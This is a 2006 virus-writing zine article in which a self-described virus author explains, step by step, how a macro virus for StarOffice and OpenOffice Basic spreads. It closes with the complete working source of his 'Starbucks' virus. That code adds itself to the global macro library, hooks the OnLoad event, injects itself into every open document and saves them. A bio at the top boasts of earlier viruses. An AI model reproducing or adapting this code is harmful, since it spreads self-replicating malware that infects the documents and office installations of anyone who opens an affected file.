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The StarOffice Basic
by roy g biv
The StarOffice Basic roy g biv / Defjam Former DOS/Win16 virus writer, author of several virus families, including Ginger (see Coderz #1 zine for terrible buggy example, contact me for better sources ;), and Virus Bulletin 9/95 for a description of what they called Rainbow. Co-author of world's first virus using circular partition trick (Orsam, coded with Prototype in 1993). Designer of world's first XMS swapping virus (John Galt, coded by RT Fishel in 1995, only 30 bytes stub, the rest is swapped out). Author of world's first virus using Thread Local Storage for replication (Shrug, see Virus Bulletin 6/02 for a description, but they call it Chiton), world's first virus using Visual Basic 5/6 language extensions for replication (OU812), world's first Native executable virus (Chthon), world's first virus using process co-operation to prevent termination (Gemini, see Virus Bulletin 9/02 for a description), world's first virus using polymorphic SMTP headers (JunkMail, see Virus Bulletin 11/02 for a description), world's first viruses that can convert any data files to infectable objects (Pretext), world's first 32/64-bit parasitic EPO .NET virus (Croissant, see Virus Bulletin 11/04 for a description, but they call it Impanate), world's first virus using self-executing HTML (JunkHTMaiL, see Virus Bulletin 7/03 for a description), world's first virus for Win64 on Intel Itanium (Shrug, see Virus Bulletin 6/04 for a description, but they call it Rugrat), world's first virus for Win64 on AMD AMD64 (Shrug), world's first cross-infecting virus for Intel IA32 and AMD AMD64 (Shrug), world's first viruses that infect Office applications and script files using the same code (Macaroni, see Virus Bulletin 11/05 for a description, but they call it Macar), world's first viruses that can infect both VBS and JScript using the same code (ACDC, see Virus Bulletin 11/05 for a description, but they call it Cada), world's first IDA plugin virus (Hidan), and world's first viruses that use the Microsoft Script Encoder to dynamically encrypt the virus body (Screed). Author of various retrovirus articles (eg see Vlad #7 for the strings that make your code invisible to TBScan). Went to sleep for a number of years. This is my first virus for StarOffice and OpenOffice. It is the world's first virus for StarOffice and OpenOffice. StarOffice Basic StarOffice has its own language called StarOffice Basic, which is similar to VBA for Microsoft Office. OpenOffice has its own language called OpenOffice Basic, which is almost identical to StarOffice Basic. The language is shared among all of the StarOffice or OpenOffice applications, so it is very easy to make a cross-platform virus. Of course, some things are different, so let's cover some of them here. In VBA, we have the Application object that is our global container. In StarOffice and OpenOffice, we have the GlobalScope object. In VBA, we have the VBE.ActiveVBProject.VBComponents object. In StarOffice and OpenOffice, we have the BasicLibraries.getByName("Standard") object. In VBA, we get our source from Item("Module1").CodeModule. In StarOffice and OpenOffice, we get our source from getbyname("Module1"). In VBA, we can add a macro by the AddFromString method. In StarOffice and OpenOffice, we can add a macro by the insertbyname method. The list would be very big to cover everything, but the important thing to know is that with one Basic for all applications, StarOffice and OpenOffice are so much simpler to use (and infect). Step-By-Step Now let's look at some source code and talk about how it works. We get access to the global template module this way: a = GlobalScope.BasicLibraries.getByName("Standard") We get access to our code module this way: b = "Starbucks" c = BasicLibraries.getByName("Standard").getByName(b) We can check if our code is present in the global module this way: if not a.hasByName(b) then We can add our code to the global module this way: a.insertByName b, c Now we want to infect all open files. We get the list this way: e = CreateUnoService("com.sun.star.frame.Desktop").getComponents However, in order to examine the items in the list, we need an enumeration object. We create one this way: f = e.createEnumeration We check if we are at the end of the list this way: while f.hasMoreElements We enumerate the items this way: g = f.nextElement For each object returned by the enumeration, we get access to the macro module this way: h = g.BasicLibraries.getByName("Standard") We check if it is infected already this way: if not h.hasByName(b) then We add our code to the current document this way: h.insertByName b, c We save the infected document this way: g.store So easy. Now we need to get control somehow. We can do that by hooking an event. In VBA, we use such special macro names as AutoOpen() and AutoClose(). In StarOffice and OpenOffice, it's done by changing the event property. The events are sequences of properties, so we need to construct the property list first. We do it this way: dim d(1) as new com.sun.star.beans.PropertyValue d(0).name="EventType" d(0).value="StarBasic" d(1).name="Script" Then we decide if we are adding to the global template or the local document. For the global template, it looks like this: d(1).value="macro:///Standard.Module.Method()" For the local document, it looks like this: d(1).value="macro://./Standard.Module.Method()" The Module and Method names can be changed to whatever we want to use. To replace a global template event, we do it this way: createUnoService("com.sun.star.frame.GlobalEventBroadcaster").Events.replaceByName "OnLoad", d() For the local document, we do it this way: g.Events.replaceByName "OnLoad", d() Of course, the OnLoad event can be changed to other things, like OnSave, etc. Now let's put it all together: Sub Starbucks 'roy g biv - 06/06/06 a = GlobalScope.BasicLibraries.getByName("Standard") b = "Starbucks" c = BasicLibraries.getByName("Standard").getByName(b) dim d(1) as new com.sun.star.beans.PropertyValue d(0).name = "EventType" d(0).value = "StarBasic" d(1).name = "Script" e = "macro://" f = "/Standard." + b + "." + b + "()" d(1).value = e + f if not a.hasByName(b) then a.insertByName b, c createUnoService("com.sun.star.frame.GlobalEventBroadcaster").Events.replaceByName "OnLoad", d() end if d(1).value = e + "." + f e = createUnoService("com.sun.star.frame.Desktop").getComponents.createEnumeration on error goto skip while e.hasMoreElements f = e.nextElement g = f.BasicLibraries.getByName("Standard") if not g.hasByName(b) then g.insertByName b, c f.Events.replaceByName "OnLoad", d() f.store end if skip: wend End Sub That's it. In 30 lines, we infect all StarOffice and OpenOffice applications. Greets to friendly people (A-Z): Active - Benny - Obleak - Prototype - Ratter - Ronin - RT Fishel - sars - SPTH - The Gingerbread Man - Ultras - uNdErX - Vallez - Vecna - VirusBuster - Whitehead rgb/defjam jun 2006 iam_rgb@hotmail.com |